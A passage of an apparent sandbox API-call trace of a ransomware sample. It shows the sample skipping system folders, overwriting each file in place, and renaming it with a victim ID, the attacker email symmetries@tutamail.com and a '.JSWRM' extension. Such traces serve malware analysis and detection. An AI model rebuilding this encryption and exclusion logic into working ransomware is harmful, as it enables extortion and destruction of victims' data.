dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0062.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0062.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0062.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0062.630] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4a0f7400, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x4a0f7400, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x4a0f7400, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x426ae, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="ParameterInfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0062.630] lstrcmpiW (lpString1="ParameterInfo.xml", lpString2=".") returned 1 [0062.630] lstrcmpiW (lpString1="ParameterInfo.xml", lpString2="..") returned 1 [0062.630] lstrcmpiW (lpString1="ParameterInfo.xml", lpString2="...") returned 1 [0062.630] lstrcmpiW (lpString1="ParameterInfo.xml", lpString2="windows") returned -1 [0062.630] lstrcmpiW (lpString1="ParameterInfo.xml", lpString2="recovery") returned -1 [0062.630] lstrcmpiW (lpString1="ParameterInfo.xml", lpString2="perflogs") returned -1 [0062.631] lstrcmpiW (lpString1="ParameterInfo.xml", lpString2="documents and settings") returned 1 [0062.631] lstrcmpiW (lpString1="ParameterInfo.xml", lpString2="$RECYCLE.BIN") returned 1 [0062.631] lstrcmpiW (lpString1="ParameterInfo.xml", lpString2="system volume information") returned -1 [0062.631] lstrcmpiW (lpString1="ParameterInfo.xml", lpString2="msocache") returned 1 [0062.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0062.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ParameterInfo.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0062.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0062.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ParameterInfo.xml", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ParameterInfo.xml", lpUsedDefaultChar=0x0) returned 17 [0062.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0062.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0062.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ParameterInfo.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0062.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0062.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ParameterInfo.xml", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ParameterInfo.xml", lpUsedDefaultChar=0x0) returned 17 [0062.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0062.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0062.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0062.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0062.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0062.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0062.631] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0062.632] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=272046) returned 1 [0062.632] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0062.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0062.632] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x27100, lpOverlapped=0x0) returned 1 [0062.643] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0062.643] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x27100, lpOverlapped=0x0) returned 1 [0062.644] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0062.644] CloseHandle (hObject=0x450) returned 1 [0062.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0062.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0062.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0062.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d490, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0062.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0062.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0062.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0062.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0062.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0062.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0062.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0062.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0062.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0062.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0062.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0062.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0062.672] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml"), lpNewFileName="C:\\588bce7c90097ed212\\ParameterInfo.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0062.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0062.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0062.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0062.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0062.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0062.672] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x19dedd00, ftCreationTime.dwHighDateTime=0x1ca2a1b, ftLastAccessTime.dwLowDateTime=0x19dedd00, ftLastAccessTime.dwHighDateTime=0x1ca2a1b, ftLastWriteTime.dwLowDateTime=0x19dedd00, ftLastWriteTime.dwHighDateTime=0x1ca2a1b, nFileSizeHigh=0x0, nFileSizeLow=0x2d200, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="RGB9RAST_x64.msi", cAlternateFileName="RGB9RA~1.MSI")) returned 1 [0062.672] lstrcmpiW (lpString1="RGB9RAST_x64.msi", lpString2=".") returned 1 [0062.672] lstrcmpiW (lpString1="RGB9RAST_x64.msi", lpString2="..") returned 1 [0062.673] lstrcmpiW (lpString1="RGB9RAST_x64.msi", lpString2="...") returned 1 [0062.673] lstrcmpiW (lpString1="RGB9RAST_x64.msi", lpString2="windows") returned -1 [0062.673] lstrcmpiW (lpString1="RGB9RAST_x64.msi", lpString2="recovery") returned 1 [0062.673] lstrcmpiW (lpString1="RGB9RAST_x64.msi", lpString2="perflogs") returned 1 [0062.673] lstrcmpiW (lpString1="RGB9RAST_x64.msi", lpString2="documents and settings") returned 1 [0062.673] lstrcmpiW (lpString1="RGB9RAST_x64.msi", lpString2="$RECYCLE.BIN") returned 1 [0062.673] lstrcmpiW (lpString1="RGB9RAST_x64.msi", lpString2="system volume information") returned -1 [0062.673] lstrcmpiW (lpString1="RGB9RAST_x64.msi", lpString2="msocache") returned 1 [0062.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0062.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RGB9RAST_x64.msi", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0062.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0062.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RGB9RAST_x64.msi", cchWideChar=16, lpMultiByteStr=0x241128, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RGB9RAST_x64.msi", lpUsedDefaultChar=0x0) returned 16 [0062.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0062.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0062.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RGB9RAST_x64.msi", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0062.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0062.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RGB9RAST_x64.msi", cchWideChar=16, lpMultiByteStr=0x241038, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RGB9RAST_x64.msi", lpUsedDefaultChar=0x0) returned 16 [0062.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0062.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0062.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0062.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0062.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0062.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0062.673] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0062.673] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=184832) returned 1 [0062.674] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0062.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0062.674] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x27100, lpOverlapped=0x0) returned 1 [0062.684] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0062.684] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x27100, lpOverlapped=0x0) returned 1 [0062.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0062.685] CloseHandle (hObject=0x450) returned 1 [0062.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf08 [0062.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0062.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0062.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0062.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0062.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0062.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0062.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0062.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0062.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0062.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0062.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0062.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0062.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0062.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0062.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0062.689] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi"), lpNewFileName="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x64.msi.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0062.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0062.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf08 | out: hHeap=0x1e0000) returned 1 [0062.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0062.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0062.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0062.690] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x177c8300, ftCreationTime.dwHighDateTime=0x1ca2a1b, ftLastAccessTime.dwLowDateTime=0x177c8300, ftLastAccessTime.dwHighDateTime=0x1ca2a1b, ftLastWriteTime.dwLowDateTime=0x177c8300, ftLastWriteTime.dwHighDateTime=0x1ca2a1b, nFileSizeHigh=0x0, nFileSizeLow=0x17200, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="RGB9Rast_x86.msi", cAlternateFileName="RGB9RA~2.MSI")) returned 1 [0062.690] lstrcmpiW (lpString1="RGB9Rast_x86.msi", lpString2=".") returned 1 [0062.690] lstrcmpiW (lpString1="RGB9Rast_x86.msi", lpString2="..") returned 1 [0062.690] lstrcmpiW (lpString1="RGB9Rast_x86.msi", lpString2="...") returned 1 [0062.690] lstrcmpiW (lpString1="RGB9Rast_x86.msi", lpString2="windows") returned -1 [0062.690] lstrcmpiW (lpString1="RGB9Rast_x86.msi", lpString2="recovery") returned 1 [0062.690] lstrcmpiW (lpString1="RGB9Rast_x86.msi", lpString2="perflogs") returned 1 [0062.690] lstrcmpiW (lpString1="RGB9Rast_x86.msi", lpString2="documents and settings") returned 1 [0062.690] lstrcmpiW (lpString1="RGB9Rast_x86.msi", lpString2="$RECYCLE.BIN") returned 1 [0062.690] lstrcmpiW (lpString1="RGB9Rast_x86.msi", lpString2="system volume information") returned -1 [0062.690] lstrcmpiW (lpString1="RGB9Rast_x86.msi", lpString2="msocache") returned 1 [0062.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0062.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RGB9Rast_x86.msi", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0062.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0062.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RGB9Rast_x86.msi", cchWideChar=16, lpMultiByteStr=0x241308, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RGB9Rast_x86.msi", lpUsedDefaultChar=0x0) returned 16 [0062.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0062.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0062.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RGB9Rast_x86.msi", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0062.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0062.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RGB9Rast_x86.msi", cchWideChar=16, lpMultiByteStr=0x241010, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RGB9Rast_x86.msi", lpUsedDefaultChar=0x0) returned 16 [0062.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0062.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c590 [0062.690] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0062.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0062.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0062.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0062.690] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0062.691] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=94720) returned 1 [0062.691] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0062.691] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x17200) returned 0x2471a8 [0062.691] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x17200, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x17200, lpOverlapped=0x0) returned 1 [0062.697] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0062.697] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x17200, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x17200, lpOverlapped=0x0) returned 1 [0062.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0062.698] CloseHandle (hObject=0x450) returned 1 [0062.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0062.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0062.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0062.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0062.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0062.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0062.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0062.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0062.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0062.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0062.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0062.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0062.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0062.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0062.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0062.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0062.700] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi"), lpNewFileName="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\rgb9rast_x86.msi.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0062.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0062.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0062.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0062.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 